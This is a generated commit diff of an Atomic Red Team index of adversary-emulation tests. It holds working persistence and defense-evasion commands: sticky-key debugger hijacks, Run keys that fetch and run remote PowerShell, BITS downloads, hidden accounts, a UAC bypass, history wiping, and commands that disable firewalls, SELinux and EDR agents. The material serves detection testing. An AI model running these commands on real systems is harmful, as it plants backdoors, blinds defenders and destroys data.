Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2018-10-20 19:38:18 +00:00
parent ae418fec76
commit 8db4f8c2a3
+1608 -960
@@ -49,8 +49,9 @@ persistence:
identifier: T1156
atomic_tests:
- name: ".bash_profile and .bashrc"
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -140,8 +141,9 @@ persistence:
identifier: T1015
atomic_tests:
- name: Attaches Command Prompt As Debugger To Process - osk
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -151,11 +153,15 @@ persistence:
default: osk.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -165,11 +171,15 @@ persistence:
default: sethc.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -179,11 +189,15 @@ persistence:
default: utilman.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -193,11 +207,15 @@ persistence:
default: magnify.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -207,11 +225,15 @@ persistence:
default: narrator.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -221,11 +243,15 @@ persistence:
default: DisplaySwitch.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -235,8 +261,11 @@ persistence:
default: atbroker.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
'':
technique:
name: Winlogon Helper DLL
@@ -381,8 +410,10 @@ persistence:
identifier: T1103
atomic_tests:
- name: Install AppInit Shim
description: |
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
supported_platforms:
- windows
input_arguments:
@@ -392,8 +423,9 @@ persistence:
default: T1103.reg
executor:
name: command_prompt
command: |
reg.exe import #{registry_file}
command: 'reg.exe import #{registry_file}
'
T1138:
technique:
name: Application Shimming
@@ -463,14 +495,16 @@ persistence:
identifier: T1138
atomic_tests:
- name: Application Shim Installation
description: |
This test injects a DLL into a custom application
description: 'This test injects a DLL into a custom application
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
sdbinst.exe AtomicShimx86.sdb
command: 'sdbinst.exe AtomicShimx86.sdb
'
T1197:
technique:
name: BITS Jobs
@@ -568,8 +602,10 @@ persistence:
- windows
executor:
name: command_prompt
command: |
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1
command: 'bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
%TEMP%\bitsadmin_flag.ps1
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -578,8 +614,10 @@ persistence:
- windows
executor:
name: powershell
command: |
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
command: 'Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
-Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
'
T1176:
technique:
name: Browser Extensions
@@ -668,8 +706,9 @@ persistence:
identifier: T1176
atomic_tests:
- name: Chrome (Developer Mode)
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- windows
@@ -685,8 +724,9 @@ persistence:
3. Click 'Select'
- name: Chrome (Chrome Web Store)
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- windows
@@ -699,8 +739,9 @@ persistence:
2. Click 'Add to Chrome'
- name: Firefox
description: |
Create a file called test.wma, with the duration of 30 seconds
description: 'Create a file called test.wma, with the duration of 30 seconds
'
supported_platforms:
- linux
- windows
@@ -780,8 +821,9 @@ persistence:
identifier: T1042
atomic_tests:
- name: Change Default File Association
description: |
Change Default File Association From cmd.exe
description: 'Change Default File Association From cmd.exe
'
supported_platforms:
- windows
input_arguments:
@@ -795,8 +837,9 @@ persistence:
default: C:\Program Files\Windows Media Player\wmplayer.exe
executor:
name: command_prompt
command: |
cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
command: 'cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
'
T1122:
technique:
name: Component Object Model Hijacking
@@ -857,8 +900,9 @@ persistence:
identifier: T1122
atomic_tests:
- name: Component Object Model Hijacking
description: |
Hijack COM Object used by certutil.exe
description: 'Hijack COM Object used by certutil.exe
'
supported_platforms:
- windows
executor:
@@ -914,8 +958,9 @@ persistence:
identifier: T1136
atomic_tests:
- name: Create a user account on a Linux system
description: |
Create a user via useradd
description: 'Create a user via useradd
'
supported_platforms:
- linux
input_arguments:
@@ -929,11 +974,13 @@ persistence:
default: Evil Account
executor:
name: bash
command: |
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
command: 'useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
'
- name: Create a user account on a MacOS system
description: |
Creates a user on a MacOS system with dscl
description: 'Creates a user on a MacOS system with dscl
'
supported_platforms:
- macos
input_arguments:
@@ -955,8 +1002,9 @@ persistence:
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
- name: Create a new user in a command prompt
description: |
Creates a new user in a command prompt
description: 'Creates a new user in a command prompt
'
supported_platforms:
- windows
input_arguments:
@@ -966,11 +1014,13 @@ persistence:
default: Evil Account
executor:
name: command_prompt
command: |
net user /add #{username}
command: 'net user /add #{username}
'
- name: Create a new user in PowerShell
description: |
Creates a new user in PowerShell
description: 'Creates a new user in PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -1063,8 +1113,9 @@ persistence:
identifier: T1158
atomic_tests:
- name: Create a hidden file in a hidden directory
description: |
Creates a hidden file inside a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
supported_platforms:
- linux
- macos
@@ -1074,17 +1125,21 @@ persistence:
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
- name: Mac Hidden file
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
command: 'sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00
00 00 40 00 FF FF FF FF 00 00"
'
- name: Hidden file
description: |
mv file to a .file
description: 'mv file to a .file
'
supported_platforms:
- macos
- linux
@@ -1099,38 +1154,46 @@ persistence:
default: "/tmp/evil"
executor:
name: sh
command: |
mv #(unknown) .#{output_filename}
command: 'mv #(unknown) .#{output_filename}
'
- name: Hidden files
description: |
Requieres Apple Dev Tools
description: 'Requieres Apple Dev Tools
'
supported_platforms:
- macos
executor:
name: sh
command: |
setfile -a V #(unknown)
command: 'setfile -a V #(unknown)
'
- name: Hide a Directory
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
chflags hidden #(unknown)
command: 'chflags hidden #(unknown)
'
- name: Show all hidden files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
defaults write com.apple.finder AppleShowAllFiles YES
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
- name: Create visible Directories
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -1142,8 +1205,9 @@ persistence:
ls
ls visible-directory
- name: Create hidden directories and files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -1155,8 +1219,10 @@ persistence:
ls -la
ls -la .hidden-directory
- name: Create ADS command prompt
description: |
Create an Alternate Data Stream with the command prompt. Write access is required.
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
supported_platforms:
- windows
input_arguments:
@@ -1175,8 +1241,10 @@ persistence:
echo "test" > :#{ads_filename}
dir /s /r | find ":$DATA"
- name: Create ADS PowerShell
description: |
Create an Alternate Data Stream with PowerShell. Write access is required.
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
supported_platforms:
- windows
input_arguments:
@@ -1314,8 +1382,9 @@ persistence:
identifier: T1179
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: |
Hooks functions in PowerShell to read TLS Communications
description: 'Hooks functions in PowerShell to read TLS Communications
'
supported_platforms:
- windows
input_arguments:
@@ -1481,8 +1550,9 @@ persistence:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -1496,11 +1566,14 @@ persistence:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
description: |
Leverage Global Flags Settings
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
@@ -1514,8 +1587,14 @@ persistence:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}"
/v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess
/d "#{payload_binary}"
'
T1159:
technique:
name: Launch Agent
@@ -1598,8 +1677,9 @@ persistence:
identifier: T1159
atomic_tests:
- name: Launch Agent
description: |
Create a plist and execute it
description: 'Create a plist and execute it
'
supported_platforms:
- macos
executor:
@@ -1700,8 +1780,9 @@ persistence:
identifier: T1160
atomic_tests:
- name: Launch Daemon
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -1785,14 +1866,16 @@ persistence:
identifier: T1152
atomic_tests:
- name: Launchctl
description: |
Utilize launchctl
description: 'Utilize launchctl
'
supported_platforms:
- macos
executor:
name: sh
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
T1168:
technique:
name: Local Job Scheduling
@@ -1880,8 +1963,9 @@ persistence:
identifier: T1168
atomic_tests:
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -1894,11 +1978,13 @@ persistence:
default: "/tmp/evil.sh"
executor:
name: sh
command: |
echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
'
- name: Cron Job
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -2000,8 +2086,9 @@ persistence:
identifier: T1037
atomic_tests:
- name: Logon Scripts
description: |
Added Via Reg.exe
description: 'Added Via Reg.exe
'
supported_platforms:
- windows
input_arguments:
@@ -2011,11 +2098,14 @@ persistence:
default: cmd.exe /c calc.exe
executor:
name: command_prompt
command: |
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
command: 'REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ
/d "#{script_command}"
'
- name: Logon Scripts - Mac
description: |
Mac logon script
description: 'Mac logon script
'
supported_platforms:
- macos
executor:
@@ -2175,8 +2265,10 @@ persistence:
identifier: T1128
atomic_tests:
- name: Netsh Helper DLL Registration
description: |
Netsh interacts with other operating system components using dynamic-link library (DLL) files
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
'
supported_platforms:
- windows
input_arguments:
@@ -2186,8 +2278,9 @@ persistence:
default: C:\Path\file.dll
executor:
name: command_prompt
command: |
netsh.exe add helper #{helper_file}
command: 'netsh.exe add helper #{helper_file}
'
T1050:
technique:
name: New Service
@@ -2258,8 +2351,9 @@ persistence:
identifier: T1050
atomic_tests:
- name: Service Installation
description: |
Installs A Local Service
description: 'Installs A Local Service
'
supported_platforms:
- windows
input_arguments:
@@ -2279,8 +2373,9 @@ persistence:
sc.exe stop #{service_name}
sc.exe delete #{service_name}
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: |
Installs A Local Service via PowerShell
description: 'Installs A Local Service via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -2500,8 +2595,9 @@ persistence:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -2571,8 +2667,10 @@ persistence:
- macos
executor:
name: sh
command: |
echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"''
>> /etc/rc.common
'
T1164:
technique:
name: Re-opened Applications
@@ -2695,8 +2793,9 @@ persistence:
identifier: T1060
atomic_tests:
- name: Reg Key Run
description: |
Run Key Persistence
description: 'Run Key Persistence
'
supported_platforms:
- windows
input_arguments:
@@ -2710,8 +2809,9 @@ persistence:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
- name: Reg Key RunOnce
description: |
RunOnce Key Persistence
description: 'RunOnce Key Persistence
'
supported_platforms:
- windows
input_arguments:
@@ -2725,8 +2825,9 @@ persistence:
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
- name: PowerShell Registry RunOnce
description: |
RunOnce Key Persistence via PowerShell
description: 'RunOnce Key Persistence via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -2741,8 +2842,9 @@ persistence:
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
- name: Startup Folder
description: |
Add Shortcut To Startup via PowerShell
description: 'Add Shortcut To Startup via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -2858,8 +2960,9 @@ persistence:
- windows
executor:
name: command_prompt
command: |
at 13:20 /interactive cmd
command: 'at 13:20 /interactive cmd
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -2875,11 +2978,13 @@ persistence:
default: 72600
executor:
name: command_prompt
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
- name: Scheduled task Remote
description: |
Create a task on a remote system
description: 'Create a task on a remote system
'
supported_platforms:
- windows
input_arguments:
@@ -2905,8 +3010,10 @@ persistence:
default: At0micStrong
executor:
name: command_prompt
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
T1180:
technique:
name: Screensaver
@@ -2967,8 +3074,11 @@ persistence:
identifier: T1180
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
description: |
This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
description: 'This test copies a binary into the Windows System32 folder and
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
'
supported_platforms:
- windows
input_arguments:
@@ -3052,11 +3162,14 @@ persistence:
- macos
executor:
name: manual
steps: |
1. /Library/StartupItems/StartupParameters.plist
steps: '1. /Library/StartupItems/StartupParameters.plist
'
- name: Startup Items (emond rule)
description: |
Establish persistence via a rule run by emond daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
description: 'Establish persistence via a rule run by emond daemon at startup,
based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
supported_platforms:
- macos
input_arguments:
@@ -3485,8 +3598,10 @@ defense-evasion:
- windows
executor:
name: command_prompt
command: |
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1
command: 'bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
%TEMP%\bitsadmin_flag.ps1
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -3495,8 +3610,10 @@ defense-evasion:
- windows
executor:
name: powershell
command: |
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
command: 'Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
-Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
'
T1009:
technique:
name: Binary Padding
@@ -3535,8 +3652,10 @@ defense-evasion:
identifier: T1009
atomic_tests:
- name: Pad Evil Binary to Change Hash
description: |
Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution
description: 'Copies cat to create an "evil binary" and pads it with a zero
to change the hash without harming execution
'
supported_platforms:
- macos
- linux
@@ -3657,8 +3776,10 @@ defense-evasion:
identifier: T1088
atomic_tests:
- name: Bypass UAC using Event Viewer
description: |
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
@@ -3746,8 +3867,10 @@ defense-evasion:
identifier: T1191
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
description: |
Adversaries may supply CMSTP.exe with INF files infected with malicious commands
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
supported_platforms:
- windows
input_arguments:
@@ -3757,11 +3880,14 @@ defense-evasion:
default: T1191.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_path}
command: 'cmstp.exe /s #{inf_file_path}
'
- name: CMSTP Executing UAC Bypass
description: |
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
supported_platforms:
- windows
input_arguments:
@@ -3771,8 +3897,9 @@ defense-evasion:
default: T1191_uacbypass.inf
executor:
name: command_prompt
command: |
cmstp.exe /s #{inf_file_uac} /au
command: 'cmstp.exe /s #{inf_file_uac} /au
'
T1146:
technique:
name: Clear Command History
@@ -3816,57 +3943,69 @@ defense-evasion:
identifier: T1146
atomic_tests:
- name: Clear Bash history (rm)
description: |
Clears bash history via rm
description: 'Clears bash history via rm
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
rm ~/.bash_history
command: 'rm ~/.bash_history
'
- name: Clear Bash history (echo)
description: |
Clears bash history via rm
description: 'Clears bash history via rm
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
echo "" > ~/.bash_history
command: 'echo "" > ~/.bash_history
'
- name: Clear Bash history (cat dev/null)
description: |
Clears bash history via cat /dev/null
description: 'Clears bash history via cat /dev/null
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
cat /dev/null > ~/.bash_history
command: 'cat /dev/null > ~/.bash_history
'
- name: Clear Bash history (ln dev/null)
description: |
Clears bash history via a symlink to /dev/null
description: 'Clears bash history via a symlink to /dev/null
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
ln -sf /dev/null ~/.bash_history
command: 'ln -sf /dev/null ~/.bash_history
'
- name: Clear Bash history (truncate)
description: |
Clears bash history via truncate
description: 'Clears bash history via truncate
'
supported_platforms:
- linux
executor:
name: sh
command: |
truncate -s0 ~/.bash_history
command: 'truncate -s0 ~/.bash_history
'
- name: Clear history of a bunch of shells
description: |
Clears the history of a bunch of different shell types by setting the history size to zero
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
'
supported_platforms:
- linux
- macos
@@ -4001,8 +4140,9 @@ defense-evasion:
identifier: T1122
atomic_tests:
- name: Component Object Model Hijacking
description: |
Hijack COM Object used by certutil.exe
description: 'Hijack COM Object used by certutil.exe
'
supported_platforms:
- windows
executor:
@@ -4181,8 +4321,9 @@ defense-evasion:
identifier: T1140
atomic_tests:
- name: Deobfuscate/Decode Files Or Information
description: |
Encode/Decode executable
description: 'Encode/Decode executable
'
supported_platforms:
- windows
input_arguments:
@@ -4196,8 +4337,10 @@ defense-evasion:
certutil.exe -encode #{executable} file.txt
certutil.exe -decode file.txt #{executable}
- name: Certutil Rename and Decode
description: |
Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
'
supported_platforms:
- windows
input_arguments:
@@ -4257,8 +4400,9 @@ defense-evasion:
identifier: T1089
atomic_tests:
- name: Disable iptables firewall
description: |
Disables the iptables firewall
description: 'Disables the iptables firewall
'
supported_platforms:
- linux
executor:
@@ -4275,8 +4419,9 @@ defense-evasion:
systemctl disable firewalld
fi
- name: Disable syslog
description: |
Disables syslog collection
description: 'Disables syslog collection
'
supported_platforms:
- linux
executor:
@@ -4291,8 +4436,9 @@ defense-evasion:
systemctl disable rsyslog
fi
- name: Disable Cb Response
description: |
Disable the Cb Response service
description: 'Disable the Cb Response service
'
supported_platforms:
- linux
executor:
@@ -4307,41 +4453,49 @@ defense-evasion:
systemctl disable cbdaemon
fi
- name: Disable SELinux
description: |
Disables SELinux enforcement
description: 'Disables SELinux enforcement
'
supported_platforms:
- linux
executor:
name: sh
command: |
setenforce 0
command: 'setenforce 0
'
- name: Disable Carbon Black Response
description: |
Disables Carbon Black Response
description: 'Disables Carbon Black Response
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
'
- name: Disable LittleSnitch
description: |
Disables LittleSnitch
description: 'Disables LittleSnitch
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
'
- name: Disable OpenDNS Umbrella
description: |
Disables OpenDNS Umbrella
description: 'Disables OpenDNS Umbrella
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
'
- name: Unload Sysmon Filter Driver
description: "Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service. \n"
@@ -4355,8 +4509,9 @@ defense-evasion:
default: SysmonDrv
executor:
name: command_prompt
command: |
fltmc.exe unload #{sysmon_driver}
command: 'fltmc.exe unload #{sysmon_driver}
'
T1107:
technique:
name: File Deletion
@@ -4411,8 +4566,10 @@ defense-evasion:
identifier: T1107
atomic_tests:
- name: Victim configuration
description: |
Create a temporary directory and several files on the victim system for later deletion
description: 'Create a temporary directory and several files on the victim system
for later deletion
'
supported_platforms:
- linux
executor:
@@ -4423,35 +4580,45 @@ defense-evasion:
touch a b c d e f g
echo "This file will be shredded" > /tmp/victim-shred.txt
- name: Delete a single file
description: |
Delete a single file from the temporary directory
description: 'Delete a single file from the temporary directory
'
supported_platforms:
- linux
executor:
name: sh
command: |
rm -f /tmp/victim-files/a
command: 'rm -f /tmp/victim-files/a
'
- name: Delete an entire folder
description: |
Recursively delete the temporary directory and all files contained within it
description: 'Recursively delete the temporary directory and all files contained
within it
'
supported_platforms:
- linux
executor:
name: sh
command: |
rm -rf /tmp/victim-files
command: 'rm -rf /tmp/victim-files
'
- name: Overwrite and delete a file with shred
description: |
Use the `shred` command to overwrite the temporary file and then delete it
description: 'Use the `shred` command to overwrite the temporary file and then
delete it
'
supported_platforms:
- linux
executor:
name: sh
command: |
shred -u /tmp/victim-shred.txt
command: 'shred -u /tmp/victim-shred.txt
'
- name: Victim configuration
description: |
Create a temporary directory and several files on the victim system for later deletion
description: 'Create a temporary directory and several files on the victim system
for later deletion
'
supported_platforms:
- windows
executor:
@@ -4476,62 +4643,77 @@ defense-evasion:
type nul > f
type nul > g
- name: Delete a single file - cmd
description: |
Delete a single file from the temporary directory using cmd.exe
description: 'Delete a single file from the temporary directory using cmd.exe
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
